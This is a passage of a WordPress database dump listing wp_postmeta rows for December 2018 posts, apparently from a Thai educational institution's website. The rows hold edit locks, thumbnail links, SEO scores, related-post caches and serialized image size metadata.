(10461, 4701, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575474279;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4632;}i:1;a:1:{s:2:\"id\";i:4704;}i:2;a:1:{s:2:\"id\";i:4986;}}}}'),
(10462, 4726, '_thumbnail_id', '4728'),
(10466, 4726, '_hide_featured', NULL),
(10467, 4726, '_yoast_wpseo_content_score', '30'),
(10468, 4726, '_yoast_wpseo_primary_category', '31'),
(10469, 4726, '_wpas_done_all', '1'),
(10470, 4726, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575169919;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6138;}i:1;a:1:{s:2:\"id\";i:6136;}i:2;a:1:{s:2:\"id\";i:5378;}}}}'),
(10471, 2947, '_yoast_wpseo_content_score', '90'),
(10472, 4732, '_edit_lock', '1544077816:3'),
(10473, 4732, '_edit_last', '3'),
(10474, 4733, '_wp_attached_file', '2018/12/47071619_716303325412525_4575238724090068992_o.jpg'),
(10475, 4733, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/12/47071619_716303325412525_4575238724090068992_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47071619_716303325412525_4575238724090068992_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47071619_716303325412525_4575238724090068992_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47071619_716303325412525_4575238724090068992_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47071619_716303325412525_4575238724090068992_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47071619_716303325412525_4575238724090068992_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10476, 4732, '_thumbnail_id', '4733'),
(10480, 4732, '_hide_featured', NULL),
(10481, 4732, '_yoast_wpseo_content_score', '30'),
(10482, 4732, '_yoast_wpseo_primary_category', '31'),
(10483, 4732, '_wpas_done_all', '1'),
(10484, 4735, '_edit_lock', '1544078434:3'),
(10485, 4735, '_edit_last', '3'),
(10486, 4736, '_wp_attached_file', '2018/12/6-12-2561-13-41-24.jpg'),
(10487, 4736, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:404;s:6:\"height\";i:591;s:4:\"file\";s:30:\"2018/12/6-12-2561-13-41-24.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-12-2561-13-41-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"6-12-2561-13-41-24-205x300.jpg\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"6-12-2561-13-41-24-205x300.jpg\";s:5:\"width\";i:205;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10488, 4737, '_wp_attached_file', '2018/12/47369608_717871381922386_5118731105565933568_o.jpg'),
(10489, 4737, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/12/47369608_717871381922386_5118731105565933568_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47369608_717871381922386_5118731105565933568_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47369608_717871381922386_5118731105565933568_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47369608_717871381922386_5118731105565933568_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47369608_717871381922386_5118731105565933568_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47369608_717871381922386_5118731105565933568_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10490, 4735, '_thumbnail_id', '4737'),
(10494, 4735, '_hide_featured', NULL),
(10495, 4735, '_yoast_wpseo_content_score', '30'),
(10496, 4735, '_yoast_wpseo_primary_category', '31'),
(10497, 4735, '_wpas_done_all', '1'),
(10498, 4739, '_edit_lock', '1544078812:3'),
(10499, 4739, '_edit_last', '3'),
(10500, 4740, '_wp_attached_file', '2018/12/47375770_2203069439717093_3287369484481855488_o.jpg'),
(10501, 4740, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1259;s:6:\"height\";i:839;s:4:\"file\";s:59:\"2018/12/47375770_2203069439717093_3287369484481855488_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"47375770_2203069439717093_3287369484481855488_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"47375770_2203069439717093_3287369484481855488_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"47375770_2203069439717093_3287369484481855488_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"47375770_2203069439717093_3287369484481855488_o-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"47375770_2203069439717093_3287369484481855488_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10502, 4735, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575496757;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4746;}i:1;a:1:{s:2:\"id\";i:4951;}i:2;a:1:{s:2:\"id\";i:4964;}}}}'),
(10503, 4739, '_thumbnail_id', '4740'),
(10507, 4739, '_hide_featured', NULL),
(10508, 4739, '_yoast_wpseo_content_score', '30'),
(10509, 4739, '_yoast_wpseo_primary_category', '31'),
(10510, 4739, '_wpas_done_all', '1'),
(10511, 4742, '_edit_lock', '1544079265:3'),
(10512, 4742, '_edit_last', '3'),
(10513, 4732, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575491659;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4746;}i:1;a:1:{s:2:\"id\";i:4937;}i:2;a:1:{s:2:\"id\";i:4722;}}}}'),
(10514, 4743, '_wp_attached_file', '2018/12/6-12-2561-13-56-16.jpg'),
(10515, 4743, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:454;s:6:\"height\";i:608;s:4:\"file\";s:30:\"2018/12/6-12-2561-13-56-16.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-12-2561-13-56-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"6-12-2561-13-56-16-224x300.jpg\";s:5:\"width\";i:224;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"6-12-2561-13-56-16-224x300.jpg\";s:5:\"width\";i:224;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10516, 4744, '_wp_attached_file', '2018/12/47358994_718414715201386_3923106467711811584_o.jpg'),
(10517, 4744, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/12/47358994_718414715201386_3923106467711811584_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47358994_718414715201386_3923106467711811584_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47358994_718414715201386_3923106467711811584_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47358994_718414715201386_3923106467711811584_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47358994_718414715201386_3923106467711811584_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47358994_718414715201386_3923106467711811584_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10518, 4742, '_thumbnail_id', '4744'),
(10522, 4742, '_hide_featured', NULL),
(10523, 4742, '_yoast_wpseo_content_score', '30'),
(10524, 4742, '_yoast_wpseo_primary_category', '31'),
(10525, 4742, '_wpas_done_all', '1'),
(10526, 4746, '_edit_lock', '1544079532:3'),
(10527, 4746, '_edit_last', '3'),
(10528, 4747, '_wp_attached_file', '2018/12/6-12-2561-14-01-13.jpg'),
(10529, 4747, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:450;s:6:\"height\";i:606;s:4:\"file\";s:30:\"2018/12/6-12-2561-14-01-13.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"6-12-2561-14-01-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"6-12-2561-14-01-13-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"6-12-2561-14-01-13-223x300.jpg\";s:5:\"width\";i:223;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10530, 4748, '_wp_attached_file', '2018/12/47575890_718557321853792_1059787509615034368_o.jpg'),
(10531, 4748, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/12/47575890_718557321853792_1059787509615034368_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47575890_718557321853792_1059787509615034368_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47575890_718557321853792_1059787509615034368_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47575890_718557321853792_1059787509615034368_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47575890_718557321853792_1059787509615034368_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47575890_718557321853792_1059787509615034368_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10532, 4746, '_thumbnail_id', '4748'),
(10536, 4746, '_hide_featured', NULL),
(10537, 4746, '_yoast_wpseo_content_score', '30'),
(10538, 4746, '_yoast_wpseo_primary_category', '31'),
(10539, 4746, '_wpas_done_all', '1'),
(10540, 4751, '_edit_lock', '1544083111:3'),
(10541, 4751, '_edit_last', '3'),
(10542, 4752, '_wp_attached_file', '2018/12/47427745_719128828463308_2380837106751635456_n.jpg'),
(10543, 4752, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:58:\"2018/12/47427745_719128828463308_2380837106751635456_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47427745_719128828463308_2380837106751635456_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47427745_719128828463308_2380837106751635456_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47427745_719128828463308_2380837106751635456_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47427745_719128828463308_2380837106751635456_n-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10544, 4751, '_thumbnail_id', '4752'),
(10548, 4751, '_hide_featured', NULL),
(10549, 4751, '_yoast_wpseo_content_score', '30'),
(10550, 4751, '_yoast_wpseo_primary_category', '31'),
(10551, 4751, '_wpas_done_all', '1'),
(10552, 4751, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575555452;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5179;}i:1;a:1:{s:2:\"id\";i:4163;}i:2;a:1:{s:2:\"id\";i:4742;}}}}'),
(10553, 4746, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575468814;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4732;}i:1;a:1:{s:2:\"id\";i:4722;}i:2;a:1:{s:2:\"id\";i:4884;}}}}'),
(10554, 4754, '_edit_lock', '1544085756:3'),
(10555, 4754, '_edit_last', '3'),
(10556, 4755, '_wp_attached_file', '2018/12/ผู้มีสิทธิ์สอบคัดเลือก-ครูอัตราจ้าง-8-อัตรา.pdf'),
(10560, 4754, '_hide_featured', NULL),
(10561, 4754, '_yoast_wpseo_content_score', '60'),
(10562, 4754, '_yoast_wpseo_primary_category', '3'),
(10563, 4754, '_wpas_done_all', '1'),
(10564, 4754, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575587401;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(10565, 4758, '_wp_attached_file', '2018/12/27-6-2561-10-59-50.jpg'),
(10566, 4758, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:241;s:4:\"file\";s:30:\"2018/12/27-6-2561-10-59-50.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"27-6-2561-10-59-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10569, 4760, '_wp_attached_file', '2018/12/Picture1.png'),
(10570, 4760, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:907;s:6:\"height\";i:263;s:4:\"file\";s:20:\"2018/12/Picture1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Picture1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Picture1-300x87.png\";s:5:\"width\";i:300;s:6:\"height\";i:87;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Picture1-768x223.png\";s:5:\"width\";i:768;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"Picture1-400x116.png\";s:5:\"width\";i:400;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10571, 1659, '_yoast_wpseo_content_score', '90'),
(10572, 4742, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575745766;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4881;}i:1;a:1:{s:2:\"id\";i:5667;}i:2;a:1:{s:2:\"id\";i:4163;}}}}'),
(10573, 4739, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575729509;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5172;}i:1;a:1:{s:2:\"id\";i:6150;}i:2;a:1:{s:2:\"id\";i:6158;}}}}'),
(10574, 4762, '_edit_lock', '1544162004:3'),
(10575, 4762, '_edit_last', '3'),
(10576, 4763, '_wp_attached_file', '2018/12/47575742_719723311737193_1478832316041134080_o.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(10577, 4763, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/12/47575742_719723311737193_1478832316041134080_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47575742_719723311737193_1478832316041134080_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47575742_719723311737193_1478832316041134080_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47575742_719723311737193_1478832316041134080_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47575742_719723311737193_1478832316041134080_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47575742_719723311737193_1478832316041134080_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10578, 4762, '_thumbnail_id', '4763'),
(10582, 4762, '_hide_featured', NULL),
(10583, 4762, '_yoast_wpseo_content_score', '30'),
(10584, 4762, '_yoast_wpseo_primary_category', '31'),
(10585, 4762, '_wpas_done_all', '1'),
(10586, 4765, '_edit_lock', '1544164103:3'),
(10587, 4765, '_edit_last', '3'),
(10588, 4766, '_wp_attached_file', '2018/12/47573800_719750965067761_4495933029142757376_o.jpg'),
(10589, 4766, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/12/47573800_719750965067761_4495933029142757376_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47573800_719750965067761_4495933029142757376_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47573800_719750965067761_4495933029142757376_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47573800_719750965067761_4495933029142757376_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47573800_719750965067761_4495933029142757376_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47573800_719750965067761_4495933029142757376_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10590, 4765, '_thumbnail_id', '4766'),
(10594, 4765, '_hide_featured', NULL),
(10595, 4765, '_yoast_wpseo_content_score', '30'),
(10596, 4765, '_yoast_wpseo_primary_category', '31'),
(10597, 4765, '_wpas_done_all', '1'),
(10598, 4762, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575714653;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4154;}i:1;a:1:{s:2:\"id\";i:5385;}i:2;a:1:{s:2:\"id\";i:4994;}}}}'),
(10599, 4768, '_edit_lock', '1544202463:3'),
(10600, 4768, '_edit_last', '3'),
